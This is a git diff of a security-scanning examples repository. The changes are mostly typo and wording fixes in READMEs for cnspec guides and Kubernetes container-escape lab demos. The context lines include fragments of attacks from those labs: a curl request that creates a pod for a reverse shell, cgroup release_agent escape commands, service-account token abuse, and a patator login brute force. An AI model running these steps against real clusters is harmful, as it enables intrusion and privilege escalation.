diff --git a/.github/actions/spelling/expect.txt b/.github/actions/spelling/expect.txt index e69de29..7a8b71f 100644 --- a/.github/actions/spelling/expect.txt +++ b/.github/actions/spelling/expect.txt @@ -0,0 +1,54 @@ +akic +baf +cgrp +chronos +cpe +cqc +dfdaf +dvwa +eecdfd +fjw +fzvkw +Gci +hnlj +hostpid +hushlogin +IBAA +icanhazip +Ikp +JFUz +Jhb +kalilinux +kbcxs +kvct +Kyybse +lhost +linux +lport +messagebus +meterpreter +MIIJKg +msfconsole +nch +NCIs +ndots +nginx +noproxy +Perfetto +pfuj +pmuench +procs +rdm +rhel +rkd +secops +Thu +timesync +umxf +unminimize +unnyfkbt +upperdir +vmss +webserver +xdsp +XVCJ diff --git a/.github/actions/spelling/patterns.txt b/.github/actions/spelling/patterns.txt index 7eb4c3c..61cbc42 100644 --- a/.github/actions/spelling/patterns.txt +++ b/.github/actions/spelling/patterns.txt @@ -89,3 +89,9 @@ aws_secret_access_key\s+\=(\s+)?.+ # score score is valid in MQL docs score score + +# SHA256 values +\nSHA256:\S* + +# long cert lines in config +\bcluster_certificate_authority_data = .* diff --git a/README.md b/README.md index 3917709..21e7c16 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@ ![samples light-mode illustration](.github/social/preview_light.jpg#gh-light-mode-only) ![samples dark-mode illustration](.github/social/preview_dark.jpg#gh-dark-mode-only) -Welcome to our comprehensive security scanning repository! In our ongoing effort to empower the highest standards of security, we've gathered a variety of examples and guides to help you conduct thorough security audits on your resources using `cnspec`, `cnquery`, and the Mondoo Platform. Our examples, ranging from AWS services to GitHub repositories, are structured with a clear overview, prerequisites, step-by-step instructions, expected results, and troubleshooting tips. We trust these will serve as a beneficial starting point for your own security scanning needs. +Welcome to our comprehensive security scanning repository! In our ongoing effort to empower the highest standards of security, we've gathered a variety of examples and guides to help you conduct thorough security audits on your resources using `cnspec`, `cnquery`, and Mondoo Platform. Our examples, ranging from AWS services to GitHub repositories, are structured with a clear overview, prerequisites, step-by-step instructions, expected results, and troubleshooting tips. We trust these will serve as a beneficial starting point for your own security scanning needs. - [What are cnspec, cnquery, and Mondoo Platform?](#what-are-cnspec-cnquery-and-mondoo-platform) - [AWS](#aws) @@ -11,11 +11,11 @@ Welcome to our comprehensive security scanning repository! In our ongoing effort - [Checking Public Exposure of AWS S3 Buckets with cnspec](#checking-public-exposure-of-aws-s3-buckets-with-cnspec) - [Verifying MFA Status for AWS IAM Users](#verifying-mfa-status-for-aws-iam-users) - [Scanning an AWS EC2 Instance with cnspec using EC2 Instance Connect](#scanning-an-aws-ec2-instance-with-cnspec-using-ec2-instance-connect) - - [Playing with AWS EC2 Instances](#playing-with-aws-ec2-instances) - [GitHub](#github) - [Performing CIS GitHub Supply Chain Benchmark with cnspec](#performing-cis-github-supply-chain-benchmark-with-cnspec) - [Hack Lab](#hack-lab) - [Demonstrating Container Escape in Kubernetes](#demonstrating-container-escape-in-kubernetes) +- [Playing with AWS EC2 Instances](#playing-with-aws-ec2-instances) - [Contributing](#contributing) ## What are cnspec, cnquery, and Mondoo Platform? @@ -24,7 +24,7 @@ Welcome to our comprehensive security scanning repository! In our ongoing effort `cnquery` is another versatile command-line tool that facilitates advanced querying against your infrastructure data, allowing you to understand and manage your infrastructure more effectively. -The Mondoo Platform is a cloud-native, security and compliance automation platform that enables businesses to secure their infrastructure continuously and at scale. +Mondoo Platform is a cloud-native, security and compliance automation platform that enables businesses to secure their infrastructure continuously and at scale. Together, these provide a comprehensive approach to managing and maintaining the security posture of your systems. @@ -66,7 +66,7 @@ This guide walks you through conducting a security scan on an AWS EC2 instance u ### Performing CIS GitHub Supply Chain Benchmark with cnspec -This guide provides an example on how to execute the CIS (Center for Internet Security) GitHub Benchmark on GitHub repositories and organizations using the `cnspec` and Mondoo platform. These benchmarks offer a standardized set of procedures to assess the security posture of GitHub repositories and organizations, helping to identify vulnerabilities or potential areas for security enhancements. +This guide provides an example on how to execute the CIS (Center for Internet Security) GitHub Benchmark on GitHub repositories and organizations using the `cnspec` and Mondoo Platform. These benchmarks offer a standardized set of procedures to assess the security posture of GitHub repositories and organizations, helping to identify vulnerabilities or potential areas for security enhancements. ![cnspec running a GitHub organization scan](./github/cis-supply-chain/github-supply-chain.gif) @@ -78,16 +78,16 @@ The Hack Lab is a collection of vulnerable systems that can be used to learn and ### Demonstrating Container Escape in Kubernetes -This houses demonstration scenarios showcasing container escapes in Kubernetes environments, particularly in AKS (Azure Kubernetes Service), EKS (Amazon Elastic Kubernetes Service) and GKE (Google Kontainer Engine). These scenarios can serve as engaging demonstrations using Mondoo. +This houses demonstration scenarios showcasing container escapes in Kubernetes environments, particularly in AKS (Azure Kubernetes Service), EKS (Amazon Elastic Kubernetes Service) and GKE (Google Container Engine). These scenarios can serve as engaging demonstrations using Mondoo. - [Instructions](./hacklab/container-escape/) ## Playing with AWS EC2 Instances -The AWS EC2 Instances is a terraform to deploy hardend and not hardend Windows as well as Linux systems. +The AWS EC2 Instances is a terraform to deploy hardened and not hardened Windows as well as Linux systems. - [Instructions](./aws/ec2-instance/) ## Contributing -We welcome contributions! Feel free to submit pull requests for new examples or improvements to existing ones. If you encounter any issues or have questions, please open an issue in this repository or join our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +We welcome contributions! Feel free to submit pull requests for new examples or improvements to existing ones. If you encounter any issues or have questions, please open an issue in this repository or join our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/aws/cis-benchmark/README.md b/aws/cis-benchmark/README.md index 0a601b4..4cd93b9 100644 --- a/aws/cis-benchmark/README.md +++ b/aws/cis-benchmark/README.md @@ -32,4 +32,4 @@ This command instructs `cnspec` to scan your AWS environment using the CIS Amazo - **AWS CLI**: Ensure that AWS CLI is installed and configured correctly. Verify that you are using the correct AWS credentials. If you encounter permission errors, check your AWS IAM role and permissions. - **Benchmark execution issues**: If the benchmark does not execute as expected, ensure that you have the necessary permissions to access all resources in your AWS account. -If you encounter a problem that is not addressed in this guide, feel free to raise an issue in this GitHub repository. For more complex or ongoing issues, consider participating in our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +If you encounter a problem that is not addressed in this guide, feel free to raise an issue in this GitHub repository. For more complex or ongoing issues, consider participating in our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/aws/ec2-instance-connect/README.md b/aws/ec2-instance-connect/README.md index ee612fb..96c4286 100644 --- a/aws/ec2-instance-connect/README.md +++ b/aws/ec2-instance-connect/README.md @@ -44,4 +44,4 @@ This command executes a security scan on your EC2 instance. - **AWS CLI and EC2 Instance Connect**: Ensure the latest AWS CLI is installed and configured correctly. Verify that you are using the correct region, availability zone, and instance ID. If you encounter permission errors, check your AWS IAM role and permissions. - **SSH connection issues**: If you cannot connect to your EC2 instance, make sure you are using the correct username (usually "ec2-user" for Amazon Linux instances). -For more complex or ongoing issues, feel free to participate in our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +For more complex or ongoing issues, feel free to participate in our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/aws/ec2-instances/README.md b/aws/ec2-instances/README.md index 1a98b34..fb57115 100644 --- a/aws/ec2-instances/README.md +++ b/aws/ec2-instances/README.md @@ -37,8 +37,8 @@ This repository contains Terraform code for provisioning AWS EC2 instances for t | Oracle 8 cnspec | Latest Oracle 8 image with latest cnspec | `create_oracle8_cnspec` | | | Oracle 8 CIS | CIS Oracle Linux 8 Benchmark - Level 1 | `create_oracle8_cis` | [CIS Oracle Linux 8 Benchmark - Level 1](https://aws.amazon.com/marketplace/pp/prodview-qohiqfju7iecs?sr=0-1&ref_=beagle&applicationId=AWSMPContessa) | | Oracle 8 CIS cnspec | CIS Oracle Linux 8 Benchmark - Level 1 with latest cnspec | `create_oracle8_cis_cnspec` | [CIS Oracle Linux 8 Benchmark - Level 1](https://aws.amazon.com/marketplace/pp/prodview-qohiqfju7iecs?sr=0-1&ref_=beagle&applicationId=AWSMPContessa) | -| RHEL 8 | Latest RedHat Enterprise Linux 8 | `create_rhel8` | | -| RHEL 8 cnspec | Latest RedHat Enterprise Linux 8 with latest cnspec | `create_rhel8_cnspec` | | +| RHEL 8 | Latest Red Hat Enterprise Linux 8 | `create_rhel8` | | +| RHEL 8 cnspec | Latest Red Hat Enterprise Linux 8 with latest cnspec | `create_rhel8_cnspec` | | | RHEL 8 CIS | CIS Red Hat Enterprise Linux 8 STIG Benchmark | `create_rhel8_cis` | [CIS Red Hat Enterprise Linux 8 STIG Benchmark](https://aws.amazon.com/marketplace/pp/prodview-ia2nfuoig3jmu?sr=0-3&ref_=beagle&applicationId=AWSMPContessa) | | RHEL 8 CIS cnspec | CIS Red Hat Enterprise Linux 8 STIG Benchmark with latest cnspec | `create_rhel8_cis_cnspec` | [CIS Red Hat Enterprise Linux 8 STIG Benchmark](https://aws.amazon.com/marketplace/pp/prodview-ia2nfuoig3jmu?sr=0-3&ref_=beagle&applicationId=AWSMPContessa) | | RHEL 9 | Latest RHEL 9 image | `create_rhel9` | | diff --git a/aws/iam-mfa/README.md b/aws/iam-mfa/README.md index 4190c89..c23cdc2 100644 --- a/aws/iam-mfa/README.md +++ b/aws/iam-mfa/README.md @@ -32,4 +32,4 @@ The output will be a list of IAM usernames with a check on whether MFA is enable - **AWS CLI**: Ensure that AWS CLI is installed and configured correctly. Verify that you are using the correct AWS credentials. If you encounter permission errors, check your AWS IAM role and permissions. - **Policy execution issues**: If the policy does not execute as expected, ensure that you have the necessary permissions to access all resources in your AWS account. -Should you encounter a problem that is not addressed in this guide, feel free to open an issue in this Github repository. For ongoing issues or broader discussions, we invite you to join us over at our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +Should you encounter a problem that is not addressed in this guide, feel free to open an issue in this GitHub repository. For ongoing issues or broader discussions, we invite you to join us over at our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/aws/public-s3/README.md b/aws/public-s3/README.md index 9a6178d..e5dc08d 100644 --- a/aws/public-s3/README.md +++ b/aws/public-s3/README.md @@ -7,7 +7,7 @@ This example uses `cnspec` to check for publicly exposed AWS S3 buckets within y ## Pre-requisites - You should have an AWS account and the necessary credentials (Access Key ID and Secret Access Key) available. -- Install cnspec following the instructions provided at the installation page of the cnspec Github repository. +- Install cnspec following the instructions provided at the installation page of the cnspec GitHub repository. ## Instructions @@ -35,4 +35,4 @@ If you encounter any issues while running the scan: - **`cnspec` Installation Issues:** If you have trouble installing cnspec, ensure you're following the instructions on the installation page correctly. -Should you encounter a problem that is not addressed in this guide, feel free to open an issue in this Github repository. For ongoing issues or broader discussions, we invite you to join us over at our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +Should you encounter a problem that is not addressed in this guide, feel free to open an issue in this GitHub repository. For ongoing issues or broader discussions, we invite you to join us over at our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/azure/README.md b/azure/README.md index 9666de9..fcd975b 100644 --- a/azure/README.md +++ b/azure/README.md @@ -46,7 +46,7 @@ terraform apply -auto-approve plan.out ### Connect to VM using `xfreerdp` from Ubuntu -Run the following command to see the the connection details (including sensitive values) +Run the following command to see the connection details (including sensitive values) ```bash terraform output -raw summary diff --git a/gcp/cis-benchmark/README.md b/gcp/cis-benchmark/README.md index 53574ba..981ed83 100644 --- a/gcp/cis-benchmark/README.md +++ b/gcp/cis-benchmark/README.md @@ -7,7 +7,7 @@ This guide provides an example on how to scan a GCP project against the CIS Goog ## Pre-requisites - You should have the `cnspec` installed. You can follow the [installation instructions](https://github.com/mondoohq/cnspec#installation) to set it up. -- You need an Google Cloud service account account and the necessary permissions. +- You need an Google Cloud service account and the necessary permissions. - The Google Cloud SDK installed and configured with access to the project you wish to scan. ## Instructions @@ -32,4 +32,4 @@ This command instructs `cnspec` to scan a Google Cloud project using the CIS Goo - **gcloud SDK CLI**: Ensure that `gcloud` CLI is [installed and configured](https://cloud.google.com/sdk/docs/install-sdk) correctly. Verify that you are using the correct account or service account credentials. If you encounter permission errors, check your IAM role and permissions. - **Benchmark execution issues**: If the benchmark does not execute as expected, ensure that you have the necessary permissions to access all resources in your Google Cloud project. -If you encounter a problem that is not addressed in this guide, feel free to raise an issue in this GitHub repository. For more complex or ongoing issues, consider participating in our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +If you encounter a problem that is not addressed in this guide, feel free to raise an issue in this GitHub repository. For more complex or ongoing issues, consider participating in our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/github/cis-supply-chain/README.md b/github/cis-supply-chain/README.md index a3a4241..518ebad 100644 --- a/github/cis-supply-chain/README.md +++ b/github/cis-supply-chain/README.md @@ -4,11 +4,11 @@ ## Overview -This guide provides an example on how to execute the CIS (Center for Internet Security) GitHub Benchmark on GitHub repositories and organizations using the `cnspec` and Mondoo platform. These benchmarks offer a standardized set of procedures to assess the security posture of GitHub repositories and organizations, helping to identify vulnerabilities or potential areas for security enhancements. +This guide provides an example on how to execute the CIS (Center for Internet Security) GitHub Benchmark on GitHub repositories and organizations using the `cnspec` and Mondoo Platform. These benchmarks offer a standardized set of procedures to assess the security posture of GitHub repositories and organizations, helping to identify vulnerabilities or potential areas for security enhancements. ## Pre-requisites -- Mondoo Space: Create a new space on the Mondoo platform and activate the 'CIS GitHub Benchmark - Level 1' benchmark in the Security Registry. +- Mondoo Space: Create a new space on Mondoo Platform and activate the 'CIS GitHub Benchmark - Level 1' benchmark in the Security Registry. - `cnspec` Login: Authenticate with your newly created Mondoo space using `cnspec login -t ` . - Organization Access: Ensure you have access to the target GitHub organization, for example https://github.com/lunalectric. - GitHub Token: Generate a GitHub token with Resource owner set to lunalectric and all permissions set to read. @@ -57,4 +57,4 @@ If you encounter any issues while performing these steps: - Permission Issues: Verify that you have the necessary permissions to access and scan the GitHub organization or repositories. This may involve checking the settings of your GitHub token and your role within the organization. - Command Execution Issues: If the `cnspec`` commands are not executing as expected, ensure that cnspec is installed and updated to the latest version. -Should you encounter a problem that is not addressed in this guide, feel free to open an issue in this Github repository. For ongoing issues or broader discussions, we invite you to join us over at our [Github discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! +Should you encounter a problem that is not addressed in this guide, feel free to open an issue in this GitHub repository. For ongoing issues or broader discussions, we invite you to join us over at our [GitHub discussions](https://github.com/orgs/mondoohq/discussions) page. We're here to help! diff --git a/hack-lab/container-escape/aws/README.md b/hack-lab/container-escape/aws/README.md index c704d3b..e90b06c 100644 --- a/hack-lab/container-escape/aws/README.md +++ b/hack-lab/container-escape/aws/README.md @@ -13,12 +13,14 @@ This folder contains Terraform automation code to provision the following: - [EKS container escape demo](#eks-container-escape-demo) - - [Prerequsites](#prerequsites) + - [Prerequisites](#prerequisites) - [Configuration](#configuration) - [Example configuration](#example-configuration) - [Provision the cluster](#provision-the-cluster) - [Connect to the cluster](#connect-to-the-cluster) - - [Deploy Mondoo Operator to AKS](#deploy-mondoo-operator-to-aks) + - [Deploy Mondoo Operator to EKS](#deploy-mondoo-operator-to-eks) + - [Deploy cert-manager](#deploy-cert-manager) + - [Deploy Mondoo Operator](#deploy-mondoo-operator) - [Deploy and configure DVWA](#deploy-and-configure-dvwa) - [Configure Port Forwarding](#configure-port-forwarding) - [Login to DVWA](#login-to-dvwa) @@ -26,15 +28,29 @@ This folder contains Terraform automation code to provision the following: - [Start the container listener](#start-the-container-listener) - [Start the host listener](#start-the-host-listener) - [Start Ruby webserver](#start-ruby-webserver) - - [Escape time](#escape-time) - - [Escalate Privileges on the container](#escalate-privileges-on-the-container) + - [Escape time via privileged container](#escape-time-via-privileged-container) + - [Escalate privileges on the container](#escalate-privileges-on-the-container) - [Gain access to worker nodes](#gain-access-to-worker-nodes) + - [Escape time via service account token](#escape-time-via-service-account-token) + - [Start the container listener](#start-the-container-listener-1) + - [Start the host listener](#start-the-host-listener-1) + - [Start the host listener](#start-the-host-listener-2) + - [Start Ruby webserver](#start-ruby-webserver-1) + - [Gain access to worker nodes through default service account token](#gain-access-to-worker-nodes-through-default-service-account-token) - [Mondoo scan commands](#mondoo-scan-commands) + - [Scan kubernetes manifest](#scan-kubernetes-manifest) + - [Scan container image from registry](#scan-container-image-from-registry) + - [Scan Kubernetes EKS cluster](#scan-kubernetes-eks-cluster) + - [Shell to Kubernetes EKS cluster](#shell-to-kubernetes-eks-cluster) +- [scan/shell kubernetes node via SSM](#scanshell-kubernetes-node-via-ssm) +- [scan/shell Kubernetes via AWS API](#scanshell-kubernetes-via-aws-api) - [Destroy the cluster](#destroy-the-cluster) + - [License and Author](#license-and-author) + - [Disclaimer](#disclaimer) -## Prerequsites +## Prerequisites - [AWS Account](https://aws.amazon.com/free/) - [AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2.html) - `~> aws-cli/2.4.28` @@ -269,7 +285,7 @@ Events: Normal Started 23s kubelet Started container dvwa ``` -Deploy also the DVWA WebApp as a none privileged container and the the malicous role binding +Deploy also the DVWA WebApp as a none privileged container and the malicious role binding ```bash kubectl apply -f ../assets/dvwa-deployment-no-privileged.yml @@ -310,7 +326,7 @@ Log in to DVWA using `admin` with the password `password`. ![Reset the Database](../assets/dvwa_db_reset.png) -Once logged in, click on "Create / Reset Database" after which, you will be logged out. Log back in to the web application and click on "Command Injection." +Once logged in, select "Create / Reset Database" after which, you will be logged out. Log back in to the web application and select "Command Injection." Next, open three command line terminals and continue the setup process. @@ -444,7 +460,7 @@ uid=33(www-data) gid=33(www-data) groups=33(www-data) You have a shell and are the `www-data` user. -### Escalate Privileges on the container +### Escalate privileges on the container Now you need do the privilege escalation within the container to gain root. In the terminal where the container listener and run the following commands: @@ -721,13 +737,13 @@ cnspec scan k8s --path ../assets/dvwa-deployment.yml cnspec scan container docker.io/pmuench/dvwa-container-escape:latest ``` -### Scan kubernetes eks cluster +### Scan Kubernetes EKS cluster ```bash cnspec scan k8s ``` -### Shell to kubernetes eks cluster +### Shell to Kubernetes EKS cluster ```bash cnspec shell k8s @@ -793,7 +809,7 @@ cnspec scan aws ec2 ssm ssm-user@ cnspec shell aws ec2 ssm ssm-user@ ``` -# scan/shell kubernetes via aws api +# scan/shell Kubernetes via AWS API ```bash export AWS_REGION=us-east-2 diff --git a/hack-lab/container-escape/azure/README.md b/hack-lab/container-escape/azure/README.md index cc2be79..4c2590a 100644 --- a/hack-lab/container-escape/azure/README.md +++ b/hack-lab/container-escape/azure/README.md @@ -12,7 +12,7 @@ This folder contains Terraform automation code to provision the following: - [AKS container escape demo](#aks-container-escape-demo) - - [Prerequsites](#prerequsites) + - [Prerequisites](#prerequisites) - [Provision the cluster](#provision-the-cluster) - [Connect to the cluster](#connect-to-the-cluster) - [Deploy Mondoo Operator to AKS](#deploy-mondoo-operator-to-aks) @@ -26,8 +26,12 @@ This folder contains Terraform automation code to provision the following: - [Start the host listener](#start-the-host-listener) - [Start Ruby webserver](#start-ruby-webserver) - [Escape time](#escape-time) - - [Escalate Privileges on the container](#escalate-privileges-on-the-container) - - [Gain access to worker nodes (Escaping the pod and getting a shell on the worker node)](#gain-access-to-worker-nodes) + - [Escalate privileges on the container](#escalate-privileges-on-the-container) + - [Gain access to worker nodes (Escaping the pod and getting a shell on the worker node)](#gain-access-to-worker-nodes-escaping-the-pod-and-getting-a-shell-on-the-worker-node) + - [1. Using ServiceAccount](#1-using-serviceaccount) + - [2. Release\_agent cgroups escape](#2-release_agent-cgroups-escape) + - [3. Cronjob](#3-cronjob) + - [Get keys from keyvault](#get-keys-from-keyvault) - [Mondoo scan commands](#mondoo-scan-commands) - [Scan kubernetes manifest](#scan-kubernetes-manifest) - [Scan container image from registry](#scan-container-image-from-registry) @@ -41,7 +45,7 @@ This folder contains Terraform automation code to provision the following: -## Prerequsites +## Prerequisites - [Azure Account](https://azure.microsoft.com/en-us/free/) - [AZ CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli) @@ -262,7 +266,7 @@ Log in to DVWA using `admin` with the password `password`. ![Reset the Database](../assets/dvwa_db_reset.png) -Once logged in, click on "Create / Reset Database" after which, you will be logged out. Log back in to the web application and click on "Command Injection." +Once logged in, select "Create / Reset Database" after which, you will be logged out. Log back in to the web application and select "Command Injection." Next, open three command line terminals and continue the setup process. @@ -401,7 +405,7 @@ uid=33(www-data) gid=33(www-data) groups=33(www-data) You have a shell and are the `www-data` user. -### Escalate Privileges on the container +### Escalate privileges on the container Now you need do the privilege escalation within the container to gain root. In the terminal where the container listener and run the following commands: @@ -462,17 +466,15 @@ In the outcome we can see the containerd which shows we are in a container (cont b. To check is if we are in a privileged container, we can check if we have access to a lot of devices. - ```bash - +```bash fdisk -l - ```` ```bash ls /dev/ ```` -There are several ways of escaping the container and land in the workernode which some of them might not work as kubernetes orchestration is keep updating in Azure. Here, we are trying three ways, which two of them is not working anymore in the new Kubernetes version (latest version deployed by terraform starting from May 2023): +There are several ways of escaping the container and land in the worker node which some of them might not work as kubernetes orchestration is keep updating in Azure. Here, we are trying three ways, which two of them is not working anymore in the new Kubernetes version (latest version deployed by terraform starting from May 2023): ### 1. Using ServiceAccount @@ -534,7 +536,7 @@ kubectl --token=`cat /run/secrets/kubernetes.io/serviceaccount/token` --certific no ``` -So, here wo donot have enough permissions and a result we cannot create a new pod from within this pod by calling the API. If we had enough permissions by getting simply 'yes' from above query, we could use following to create a pod and at the same listening on the port 4244 to get a reverse shell: +So, here we don't have enough permissions and a result we cannot create a new pod from within this pod by calling the API. If we had enough permissions by getting simply 'yes' from above query, we could use following to create a pod and at the same listening on the port 4244 to get a reverse shell: ```bash curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X POST ${APISERVER}/apis/apps/v1/namespaces/default/deployments -H 'Content-Type: application/yaml' -d '--- @@ -583,7 +585,7 @@ chmod a+x /cmd sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" ``` -We can confirm that it did not work in the new version of the kubernets in Azure, and most probably it should be related to the fact that cgroup exploit was mainly related to the Docker and not the containerd! +We can confirm that it did not work in the new version of the Kubernetes in Azure, and most probably it should be related to the fact that cgroup exploit was mainly related to the Docker and not the containerd! ### 3. Cronjob diff --git a/hack-lab/container-escape/gcp/README.md b/hack-lab/container-escape/gcp/README.md index 457d62f..4f4b9e0 100644 --- a/hack-lab/container-escape/gcp/README.md +++ b/hack-lab/container-escape/gcp/README.md @@ -12,7 +12,7 @@ This folder contains Terraform automation code to provision the following: - [GKE container escape demo](#gke-container-escape-demo) - - [Prerequsites](#prerequsites) + - [Prerequisites](#prerequisites) - [Provision the cluster](#provision-the-cluster) - [Connect to the cluster](#connect-to-the-cluster) - [Deploy Mondoo Operator to GKE](#deploy-mondoo-operator-to-gke) @@ -23,26 +23,27 @@ This folder contains Terraform automation code to provision the following: - [Login to DVWA](#login-to-dvwa) - [Setup Attacker Linux Instance](#setup-attacker-linux-instance) - [Start the container listener](#start-the-container-listener) - - [Start the host listener](#start-the-host-listener) - [Start Ruby webserver](#start-ruby-webserver) + - [Determine the attacker machine's public IP](#determine-the-attacker-machines-public-ip) + - [Escape time](#escape-time) - [Escaping the pod and get a shell on the node (google compute instance)](#escaping-the-pod-and-get-a-shell-on-the-node-google-compute-instance) - [Enumerate Privileges of the service account running the container](#enumerate-privileges-of-the-service-account-running-the-container) - [Deploy a pod that will get you a `root` account on the node](#deploy-a-pod-that-will-get-you-a-root-account-on-the-node) - - [Gaining a persistant bash shell on the node](#gaining-a-persistant-bash-shell-on-the-node) + - [Gaining a persistent bash shell on the node](#gaining-a-persistent-bash-shell-on-the-node) - [Mondoo scan commands](#mondoo-scan-commands) - [Scan kubernetes manifest](#scan-kubernetes-manifest) - [Scan container image from registry](#scan-container-image-from-registry) - - [Scan kubernetes gke cluster](#scan-kubernetes-gke-cluster) - - [Shell to kubernetes gke cluster](#shell-to-kubernetes-gke-cluster) - - [Scan a google cloud project](#scan-a-google-cloud-project) - - [Shell to google cloud project](#shell-to-google-cloud-project) + - [Scan Kubernetes GKE cluster](#scan-kubernetes-gke-cluster) + - [Shell to Kubernetes GKE cluster](#shell-to-kubernetes-gke-cluster) + - [Scan a Google Cloud project](#scan-a-google-cloud-project) + - [Shell to a Google Cloud project](#shell-to-a-google-cloud-project) - [Destroy the cluster](#destroy-the-cluster) - [License and Author](#license-and-author) - [Disclaimer](#disclaimer) -## Prerequsites +## Prerequisites - [Google GCP Account](https://cloud.google.com/free/) - make sure you to give the account your login in with the following IAM role [here](https://console.cloud.google.com/iam-admin): @@ -68,19 +69,19 @@ This folder contains Terraform automation code to provision the following: - make sure to install the [gke-gcloud-auth-plugin](https://cloud.google.com/blog/products/containers-kubernetes/kubectl-auth-changes-in-gke), usually via the command: - ``` + ```bash gcloud components install gke-gcloud-auth-plugin ``` - - make sure to login to you Google Cloud Account account via: + - make sure to login to you Google Cloud account via: - ``` + ```bash gcloud auth application-default login ``` - make sure to set gcloud CLI to the right project - ``` + ```bash gcloud config set project #e.g. my-test-project ``` @@ -97,25 +98,25 @@ git clone git@github.com:Lunalectric/container-escape.git 2. cd into the terraform folder -``` +```bash cd container-escape/gke ``` 3. Initialize the project (download modules) -``` +```bash terraform init ``` 4. Check that everything is ready (and safe plan to a local file) -``` +```bash terraform plan -out plan.out ``` 5. Apply the configuration -``` +```bash terraform apply plan.out -auto-approve ``` @@ -269,7 +270,7 @@ Log in to DVWA using `admin` with the password `password`. ![Reset the Database](../assets/dvwa_db_reset.png) -Once logged in, click on "Create / Reset Database" after which, you will be logged out. Log back in to the web application and click on "Command Injection." +Once logged in, select "Create / Reset Database" after which, you will be logged out. Log back in to the web application and select "Command Injection." Next, open three command line terminals and continue the setup process. @@ -346,7 +347,7 @@ root@attacker:~/container-escape# ./start_ruby_webserver [2022-08-15 18:28:35] INFO WEBrick::HTTPServer#start: pid=3850 port=8001 ``` -### Find out the attacker machines public IP: +### Determine the attacker machine's public IP ```bash root@lunalectric-attacker-vm-3v0c:~# cat container-escape/pub-ip @@ -472,7 +473,7 @@ curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata gke-lunalectric-gke--lunalectric-pool-0e144d64-33rz.us-central1-f.c.-development-3.internal ``` -## Gaining a persistant bash shell on the node +## Gaining a persistent bash shell on the node **Confirming the hostname and IP address of the node** First we need to find out on which node we are operating. @@ -650,13 +651,13 @@ cnspec scan k8s --path ../assets/dvwa-deployment-no-privileged.yml cnspec scan container docker.io/pmuench/dvwa-container-escape:latest ``` -### Scan kubernetes gke cluster +### Scan Kubernetes GKE cluster ```bash cnspec scan k8s ``` -### Shell to kubernetes gke cluster +### Shell to Kubernetes GKE cluster ```bash cnspec shell k8s diff --git a/hack-lab/container-escape/minikube/README.md b/hack-lab/container-escape/minikube/README.md index f823ae1..4ab9c0d 100644 --- a/hack-lab/container-escape/minikube/README.md +++ b/hack-lab/container-escape/minikube/README.md @@ -7,7 +7,7 @@ This folder contains Terraform automation code to provision the following: - **Ubuntu 20.04 AWS EC2 Instance** - This instance is provisioned for the minikube and to demonstrate the container escape - **Windows 2016** - This instance is provisioned for the demonstration of the Windows Hack and Printnightmare vulnerability. (ami-0808d6a0d91e57fd3 in eu-central-1) -### Prerequsites +### Prerequisites - [AWS Account](https://aws.amazon.com/free/) - [AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2.html) - `~> aws-cli/2.4.28` diff --git a/hack-lab/container-escape/minikube/output.tf b/hack-lab/container-escape/minikube/output.tf index d3ba231..d5795ad 100644 --- a/hack-lab/container-escape/minikube/output.tf +++ b/hack-lab/container-escape/minikube/output.tf @@ -46,7 +46,7 @@ ubuntu@ip-10-0-4-175:~$ kubectl apply -f dvwa-deployment.yaml - check and configure the DVWA (login: admin/password) - Open a browser and navigate to http://${module.ubuntu-k8s-instance.public_ip}:8080. - Log in to DVWA using `admin` with the password `password`. -- Once logged in, click on "Create / Reset Database" after which, you will be logged out. Log back in to the web application and click on "Command Injection." +- Once logged in, select "Create / Reset Database" after which, you will be logged out. Log back in to the web application and select "Command Injection." - Next, open three command line terminals and continue the setup process. - get the POD name @@ -135,7 +135,7 @@ SESSIONID=$(grep PHPSESSID dvwa.cookie | cut -d $'\t' -f7) patator http_fuzz 1=/usr/share/wordlists/metasploit/http_default_users.txt 0=/usr/share/wordlists/metasploit/http_default_pass.txt --threads=8 timeout=1 --rate-limit=1 url="http://${module.ubuntu-k8s-instance.private_ip}:8080/login.php" method=POST body="username=FILE1&password=FILE0&user_token=$\{CSRF}&Login=Login" header="Cookie: PHPSESSID=$\{SESSIONID}" -x ignore:fgrep=login.php -x quit:fgrep=index.php follow=0 accept_cookie=0 09:01:15 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.10 at 2022-06-03 09:01 UTC -09:01:15 patator INFO - +09:01:15 patator INFO - 09:01:15 patator INFO - code size:clen time | candidate | num | mesg 09:01:15 patator INFO - ----------------------------------------------------------------------------- 09:01:17 patator INFO - 302 424:0 0.012 | password:admin | 15 | HTTP/1.1 302 Found @@ -210,7 +210,7 @@ id uid=0(root) gid=0(root) groups=0(root),33(www-data) ``` -- next we compromise the the ubuntu vm +- next we compromise the ubuntu vm - login via another console to your Kali machine ```bash @@ -256,7 +256,7 @@ password: ${random_string.suffix.result} bash -c "$(curl -sSL https://install.mondoo.com/sh/cnquery)" ``` -### List all privileged Pods +### List all privileged Pods - kubectl cli @@ -554,7 +554,7 @@ spec: ' ``` -- next we compromise the the ubuntu vm +- next we compromise the ubuntu vm - login via another console to your Kali machine ```bash diff --git a/hack-lab/windows-hack-environment/README.md b/hack-lab/windows-hack-environment/README.md index 59e9481..23dd4f8 